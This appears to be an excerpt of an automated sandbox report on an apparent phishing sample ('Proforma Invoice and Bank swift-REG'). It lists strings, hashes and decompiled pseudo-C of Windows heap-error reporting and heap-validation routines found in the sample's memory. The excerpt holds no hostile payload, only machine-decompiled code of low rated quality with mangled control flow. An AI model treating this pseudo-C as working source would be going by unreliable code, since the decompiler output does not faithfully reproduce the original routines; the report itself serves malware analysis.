*** An Access Violation occurred in %ws:%s, xrefs: 00B9B48F
This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 00B9B484
Go determine why that thread has not released the critical section., xrefs: 00B9B3C5
This means that the I/O device reported an I/O error. Check your hardware., xrefs: 00B9B476
This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 00B9B305
<unknown>, xrefs: 00B9B27E, 00B9B2D1, 00B9B350, 00B9B399, 00B9B417, 00B9B48E
*** Resource timeout (%p) in %ws:%s, xrefs: 00B9B352
The instruction at %p tried to %s , xrefs: 00B9B4B6
This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 00B9B47D
The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 00B9B3D6
The resource is owned shared by %d threads, xrefs: 00B9B37E
The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 00B9B323
*** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 00B9B53F
write to, xrefs: 00B9B4A6
*** enter .cxr %p for the context, xrefs: 00B9B50D
The instruction at %p referenced memory at %p., xrefs: 00B9B432
an invalid address, %p, xrefs: 00B9B4CF
*** Critical Section Timeout (%p) in %ws:%s, xrefs: 00B9B39B

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
API String ID: 0-108210295
Opcode ID: 2e0369b2637e9b736f2cacf5967f97cc1a80133f9d0518f11c7d268106667b6e
Instruction ID: 2ec605601bc1b61edebb6ac97b2d66c894a9520ce6f5cbec7894c3ac37832071
Opcode Fuzzy Hash: 2e0369b2637e9b736f2cacf5967f97cc1a80133f9d0518f11c7d268106667b6e
Instruction Fuzzy Hash: DE811575A40200FFCF25AB05AD86D6B3FB6EF56B52F0184E5F0092B353D3A18A01D672

Uniqueness

Uniqueness Score: -1.00%

Function 00BA1C06, Relevance: 31.4, Strings: 25, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00BA1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0xac48a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00AEB150();
				} else {
					E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0xbd589c);
				E00AEB150("Heap error detected at %p (heap handle %p)\n",  *0xbd58a0);
				_t27 =  *0xbd5898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M00BA1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00AEB150();
				} else {
					E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E00AEB150("Error code: %d - %s\n",  *0xbd5898);
				_t113 =  *0xbd58a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00AEB150("Parameter1: %p\n",  *0xbd58a4);
				}
				_t115 =  *0xbd58a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00AEB150("Parameter2: %p\n",  *0xbd58a8);
				}
				_t117 =  *0xbd58ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E00AEB150("Parameter3: %p\n",  *0xbd58ac);
				}
				_t119 =  *0xbd58b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0xbd58b4);
					E00AEB150("Last known valid blocks: before - %p, after - %p\n",  *0xbd58b0);
				} else {
					_t120 =  *0xbd58b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E00AEB150();
				} else {
					E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E00AEB150("Stack trace available at %p\n", 0xbd58c0);
			}

0x00ba1c10
0x00ba1c16
0x00ba1c1e
0x00ba1c3d
0x00ba1c3e
0x00ba1c20
0x00ba1c35
0x00ba1c3a
0x00ba1c44
0x00ba1c55
0x00ba1c5a
0x00ba1c65
0x00ba1c67
0x00000000
0x00ba1c6e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba1c67
0x00ba1cdc
0x00ba1ce5
0x00ba1d04
0x00ba1d05
0x00ba1ce7
0x00ba1cfc
0x00ba1d01
0x00ba1d0b
0x00ba1d17
0x00ba1d1f
0x00ba1d25
0x00ba1d30
0x00ba1d4f
0x00ba1d50
0x00ba1d32
0x00ba1d47
0x00ba1d4c
0x00ba1d61
0x00ba1d67
0x00ba1d68
0x00ba1d6e
0x00ba1d79
0x00ba1d98
0x00ba1d99
0x00ba1d7b
0x00ba1d90
0x00ba1d95
0x00ba1daa
0x00ba1db0
0x00ba1db1
0x00ba1db7
0x00ba1dc2
0x00ba1de1
0x00ba1de2
0x00ba1dc4
0x00ba1dd9
0x00ba1dde
0x00ba1df3
0x00ba1df9
0x00ba1dfa
0x00ba1e00
0x00ba1e0a
0x00ba1e13
0x00ba1e32
0x00ba1e33
0x00ba1e15
0x00ba1e2a
0x00ba1e2f
0x00ba1e39
0x00ba1e4a
0x00ba1e02
0x00ba1e02
0x00ba1e08
0x00000000
0x00000000
0x00ba1e08
0x00ba1e5b
0x00ba1e7a
0x00ba1e7b
0x00ba1e5d
0x00ba1e72
0x00ba1e77
0x00ba1e95

Strings

heap_failure_multiple_entries_corruption, xrefs: 00BA1C8A
heap_failure_freelists_corruption, xrefs: 00BA1CC9
Heap error detected at %p (heap handle %p), xrefs: 00BA1C50
heap_failure_internal, xrefs: 00BA1C6E
heap_failure_block_not_busy, xrefs: 00BA1CA6
Parameter2: %p, xrefs: 00BA1DA5
Last known valid blocks: before - %p, after - %p, xrefs: 00BA1E45
Stack trace available at %p, xrefs: 00BA1E86
heap_failure_entry_corruption, xrefs: 00BA1C83
heap_failure_invalid_argument, xrefs: 00BA1CAD
HEAP[%wZ]: , xrefs: 00BA1C30, 00BA1CF7, 00BA1D42, 00BA1D8B, 00BA1DD4, 00BA1E25, 00BA1E6D
heap_failure_listentry_corruption, xrefs: 00BA1CD0
heap_failure_virtual_block_corruption, xrefs: 00BA1C91
heap_failure_buffer_overrun, xrefs: 00BA1C98
heap_failure_buffer_underrun, xrefs: 00BA1C9F
Error code: %d - %s, xrefs: 00BA1D12
Parameter3: %p, xrefs: 00BA1DEE
HEAP: , xrefs: 00BA1C16, 00BA1C3D, 00BA1D04, 00BA1D4F, 00BA1D98, 00BA1DE1, 00BA1E32, 00BA1E7A
heap_failure_cross_heap_operation, xrefs: 00BA1CC2
heap_failure_lfh_bitmap_mismatch, xrefs: 00BA1CD7
heap_failure_generic, xrefs: 00BA1C7C
heap_failure_usage_after_free, xrefs: 00BA1CBB
heap_failure_invalid_allocation_type, xrefs: 00BA1CB4
Parameter1: %p, xrefs: 00BA1D5C
heap_failure_unknown, xrefs: 00BA1C75

Memory Dump Source

Source File: 00000002.00000002.704512150.0000000000AC0000.00000040.00000001.sdmp, Offset: 00AC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ac0000_Proforma Invoice and Bank swift-REG.jbxd

Similarity

API ID:
String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
API String ID: 0-2897834094
Opcode ID: 2005b2bfe0ab6c67db153975681864bed145b0a0381dfc9a7cb0787b240066e4
Instruction ID: 9d04354bc607f1d1cb193ed4a482b20ef2e30acb6fcdeb33c1aed3b2015f78a0
Opcode Fuzzy Hash: 2005b2bfe0ab6c67db153975681864bed145b0a0381dfc9a7cb0787b240066e4
Instruction Fuzzy Hash: 4861163256A581DFC351FB89D999E21B3E4EB05B70F1988BFF40A6F351E7218C409B1A

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4AEF, Relevance: 11.8, Strings: 9, Instructions: 529
COMMONCrypto

Download Yara Rule

C-Code - Quality: 59%

			E00BA4AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E00AEB150();
						} else {
							E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E00AEB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E00AEB150();
					} else {
						E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E00B9FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E00AEB150();
						} else {
							E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E00AEB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E00AEB150();
									} else {
										E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E00AEB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E00B9FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E00AEB150();
										} else {
											E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E00B3D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E00AEB150();
								} else {
									E00AEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E00BAA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E00B0E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E00BAA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E00B0E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E00B0A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E00B0A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E00B0BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E00B923E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E00AE1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}

0x00ba4af7
0x00ba4afb
0x00ba4afd
0x00ba4b01
0x00ba4b03
0x00ba4b08
0x00ba4b0a
0x00ba4b0f
0x00ba4eb5
0x00ba4eb5
0x00ba4ebb
0x00ba50d5
0x00ba50d8
0x00ba4ff6
0x00000000
0x00ba4ff6
0x00ba50de
0x00ba50e4
0x00ba50e8
0x00ba5107
0x00ba510c
0x00ba50ea
0x00ba50ff
0x00ba5104
0x00ba5112
0x00ba5115
0x00ba5118
0x00ba5119
0x00ba50cb
0x00ba50cb
0x00ba50af
0x00000000
0x00ba50af
0x00ba4ecb
0x00ba50b6
0x00ba50bb
0x00ba4ed1
0x00ba4ee6
0x00ba4eeb
0x00ba50c1
0x00ba50c2
0x00ba50c5
0x00ba50c6
0x00000000
0x00000000
0x00000000
0x00000000
0x00ba4b15
0x00ba4b15
0x00ba4b1c
0x00ba4b1e
0x00ba4b23
0x00ba4b27
0x00ba4b33
0x00ba4b38
0x00ba4b3a
0x00ba4b3c
0x00ba4b41
0x00ba4b41
0x00ba4b3a
0x00ba4b52
0x00ba5045
0x00ba504b
0x00ba504f
0x00ba506e
0x00ba5073
0x00ba5051
0x00ba5066
0x00ba506b
0x00ba5083
0x00ba5088
0x00ba5088
0x00ba508a
0x00ba5091
0x00ba5099
0x00ba5099
0x00ba509d
0x00ba50a7
0x00ba50ad
0x00ba50ad
0x00ba50ad
0x00000000
0x00ba509d
0x00ba4b58
0x00ba4b5b
0x00ba4b5e
0x00ba4b63
0x00ba4b66
0x00ba4b69
0x00ba4b6f
0x00ba4be4
0x00ba4bf0
0x00ba4bf2
0x00ba4bf5
0x00ba4dc3
0x00ba4dc6
0x00ba4dc9
0x00ba4dce
0x00ba4dce
0x00ba4dd0
0x00ba4dd0
0x00ba4dd5
0x00ba4def
0x00ba4dd7
0x00ba4de7
0x00ba4de7
0x00ba4df3
0x00ba5001
0x00ba5007
0x00ba500b
0x00ba502a
0x00ba502f
0x00ba500d
0x00ba5022
0x00ba5027
0x00ba5039
0x00ba503a
0x00ba503b
0x00000000
0x00ba4df9
0x00ba4dfd
0x00ba4e90
0x00ba4e94
0x00ba4e9e
0x00ba4ea4
0x00ba4ea4
0x00ba4ea4
0x00ba4ea6
0x00ba4ea6
0x00000000
0x00ba4ea6
